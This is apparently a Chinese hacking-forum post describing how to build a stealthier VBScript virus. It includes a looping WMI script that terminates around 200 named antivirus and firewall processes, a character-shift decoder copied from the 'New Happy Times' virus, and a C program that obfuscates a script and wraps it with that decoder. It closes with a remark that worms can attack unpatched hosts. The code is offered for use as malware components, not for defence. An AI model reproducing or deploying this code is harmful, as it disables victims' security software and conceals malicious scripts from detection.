告别了以往爱出风头,爱吹牛皮的时代,学点真本事才是硬道理。好好学习,天天向上。下面是对超级脚本病毒的构想。
脚本病毒的制造非常的容易,对于一个对编程一窍不通的人来说,只要对windows系统和注册表有足够的了解,在到网络上下载几个病毒代码仔细看看,就能在短时间内写出一个病毒的变种体来,脚本病毒的特征性就是那么几个,没有多少编程技巧而言,所以真正的病毒制造者是不用vbscript写病毒的,现在由于脚本语言的流行,以及Micrsoft推出的WSH(Windows Script Hosting),更让这些脚本语言可以在一台计算机上兴风作浪。WSH是一个能让Visual Basic Script和JScript脚本在Windows环境下,如命令行里的批处理文件一样运行的一个服务。
它可以让Script去创建一个Windows里的COM/OLE对象,并去使用这些对象里的方法,属性和事件。脚本病毒的制造非常的容易,对于一个对编程一窍不通的人来说,只要对windows系统和注册表有足够的了解,在到网络上下载几个病毒代码仔细看看,就能在短时间内写出一个病毒的变种体来.因此脚本病毒容易写,也容易被清楚和防范,网上针对怎样防范它的文章可谓多如牛毛,人亦发展,病毒也要进化。假设:老猫开始训练了,老鼠如果不训练那不是找死嘛。
1,现在的很多杀毒软件都能对未知的脚本病毒做出判断,所以病毒要想生存就必须做出更好的保护:
(1).病毒要用到大量的VMI,使其可以杀掉杀毒软件或防火墙的进程,这里我给出一段代码:
do
strComputer = "."
Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")
fv = Array(""Notepad.exe"", ""pccguide.exe"", ""pccclient.exe"",""Rfw.exe"", ""DAVPFW.exe"", ""vpc32.exe"", ""ravmon.exe"", ""debu.exe"", ""scan.exe"", ""mon.exe"", ""vir.exe"", ""iom.exe"", ""ice.exe"", ""anti.exe"", ""fir.exe"", ""prot.exe"", ""secu.exe"", ""dbg.exe"", ""pcc.exe"", ""avk.exe"", ""spy.exe"", ""pcciomon.exe"", ""pccmain.exe"", ""pop3trap.exe"", ""webtrap.exe"", ""vshwin32.exe"", ""vsstat.exe"", ""navapw32.exe"", ""lucomserver.exe"", ""lamapp.exe"", ""atrack.exe"", ""nisserv.exe"", ""vavrunr.exe"", ""navwnt.exe"", ""pview95.exe"", ""luall.exe"", ""avxonsol.exe"", ""avsynmgr.exe"", ""symproxysvc.exe"", ""regedit.exe"", ""smtpsvc.exe"", ""moniker.exe"", ""program.exe"", ""explorewclass.exe"", ""rn.exe"", ""ms.exe"", ""microsoft.exe"", ""office.exe"", ""smtpsvc.exe"", ""avconsol.exe"", ""avsunmgr.exe"", ""vsstat.exe"", ""navapw32.exe"", ""navw32.exe"", ""nmain.exe"", ""luall.exe"", ""lucomserver.exe"", ""iamapp.exe"", ""atrack.exe"", ""nisserv.exe"", ""rescur32.exe"", ""nisum.exe"", "" navlu32.exe"", ""navrunr.exe"", ""pview95.exe"", ""f-stopw.exe"", ""f-prot95.exe"", ""pccwin98.exe"", ""fp-win.exe"", ""nvc95.exe"", ""norton.exe"", ""mcafee.exe"", ""antivir.exe"", ""webscanx.exe"", ""safeweb.exe"", ""cfinet.exe"", ""cfinet32.exe"", ""avp.exe"", ""lockdown2000.exe"", ""lockdown2002.exe"", ""zonealarm.exe"", ""wink.exe"", ""sirc32.exe"", ""scam32.exe"", ""regedit.exe"", ""tmoagent.exe"", ""tmntsrv.exe"", ""tmproxy.exe"", ""tmupdito.exe"", ""tsc.exe"", ""krf.exe"", ""kpfw32.exe"", ""_avpm.exe"", ""autodown.exe"", ""avkser.exe"", ""avpupd.exe"", ""blackd.exe"", ""cfind.exe"", ""cleaner.exe"", ""ecengine.exe"", ""fp-win.exe"", ""iamserv.exe"", ""lcloadnt.exe"", ""lookout.exe"", ""n32acan.exe"", ""navw32.exe"", ""normist.exe"", ""padmin.exe"", ""pccwin98.exe"", ""rav7win.exe"", ""smc.exe"", ""tca.exe"", ""vettray.exe"", ""ackwin32.exe"", ""avpnt.exe"", ""avpdos32.exeP"", ""avsched32.exe"", ""blackice.exe"", ""efinet32.exe"", ""esafe.exe"", ""ibmasn.exe"", ""icmoon.exe"", ""navapw32.exe"", ""nupgrade.exe"", ""pavcl.exe"", ""pcfwallicon.exe"", ""scanpm.exe"", ""sphinx.exe"", ""sphinx.exe"", ""tds2-98.exe"", ""vsscan40.exe"", ""webscanx.exe"", ""webscan.exe"", ""anti-trojan.exe"", ""ave32.exe"", ""avp.exe"", ""avpm.exe"", ""cfiadmin.exe"", ""dvp95.exe"", ""espwatch.exe"", ""ibmavsp.exe"", ""icsupp95.exe"",""jed.exe"", ""moolive.exe"", ""nisum.exeP"", ""nvc95.exe"", ""navsched.exe"", ""persfw.exe"", ""safeweb.exe"", ""scrscan.exe"", ""sweep95.exe"", ""tds2-nt.exe"", ""_avpcc.exe"", ""apvxdwin.exe"", ""avwupd32.exe"", ""cfiaudit.exe"", ""claw95ct.exe"", ""dv95_O.exe"", ""f-agnt94.exe"", "" findviru.exe"", ""iamapp.exe"", ""icload95.exe"", ""icssuppnt.exe"", ""mpftray.exe"", ""nmain.exe"", ""rav7.exe"", ""scan32.exe"", ""serv95.exe"", ""vshwin32.exe"", ""zonealarm.exe"", ""avpmon.exe"", ""avp32.exe"", ""kavsvc.exe"", ""mcagent.exe"", ""nvsvc32.exe"", ""mcmnhdlr.exe"", ""regsvc.exe"", ""mailmon.exe"", ""fp-win.exe"", ""mghtml.exe"")"
for Each fa in fv
Set colProcessList = objWMIService.ExecQuery (""Select * from Win32_Process Where Name = ’""&fa&""’"")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
next
loop
Array()数组存放了200多个杀毒软件和防火墙的主进程,当然你可以在程序的一开始就定义这个数组,在下面的感染函数部分中,用它就可以删除这些软件的主程序体。猪都能想到的问题,不需要我再说了把。因为我的网名也叫“猪猪”,这些必须要抢在杀毒软件之前运行起来才能达到目的。
(2).病毒要尽可能的用到变形功能,使用新的加密算法,当然脚本的加密算法是很简单的,在这一点上新欢乐时光就做的很好.
Execute DeCode("kqe`mv fcjjm ")
Function DeCode(Coded)
For i=1 To Len(Coded)
Curchar=Mid(Coded,i,1)
If Asc(Curchar) = 15 then Curchar=chr(10)
Else if Asc(Curchar) = 16 then Curchar=chr(13)
Else if Asc(Curchar) = 17 then Curchar=chr(32)
Else if Asc(Curchar) = 18 then Curchar=chr(9)
Else Curchar=chr(Asc(Curchar)-2)
end if
DeCode=Decode & Curchar
Next
End function
下面给出一个c的示例(技术不过关,请各位老大指教 Hackercc@qq.com )
#include <string.h>
#include <stdio.h>
main()
{
FILE *in,*out,*read;
char *exc="Execute DeCode(\"";
char *excu="\")\n";
char *func="Function DeCode(Coded)\nFor i=1 To Len(Coded)\nCurchar=Mid(Coded,i,1)\n";
char *funct="If Asc(Curchar) = 15 then Curchar=chr(10)\nElse if Asc(Curchar) = 16 then Curchar=chr(13)\n";
char *functi="Else if Asc(Curchar) = 17 then Curchar=chr(32)\nElse if Asc(Curchar) = 18 then Curchar=chr(9)\nElse Curchar=chr(Asc(Curchar)-2)\nend if\nDeCode=Decode & Curchar\nNext\nEnd function\n";
char buf[100][101];
char name[30];
char ch;
char *p;
int i=0,j=0;
gets(name);
if((in=fopen(name,"r+"))==NULL)
{
printf("Can’t open the file %",name);
exit(0);
}
ch=getc(in);
while(!feof(in))
{
if(ch==15) ch=10;
else if(ch==16) ch=13;
else if(ch==17) ch=32;
else if(ch==18) ch=9;
else ch=ch-2;
fseek(in,-1L,1);
fputc(ch,in);
fseek(in,0L,1);
ch=getc(in);
}
fclose(in);
read=fopen(name,"r+");
do
{
if(i>=100)
{
fclose(in);
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(read);
out=fopen(name,"w+");
fputs(exc,out);
for(;j<i-1;j++)
{
fputs(buf[j],out);
}
fputs(excu,out);
fputs(func,out);
fputs(funct,out);
fputs(functi,out);
fclose(out);
}
2, 病毒的攻击性可以扩展到有系统漏洞的主机上,蠕虫可以利用一些基本的DOS命令和第三方黑客工具来进行漏洞攻击
关注我们
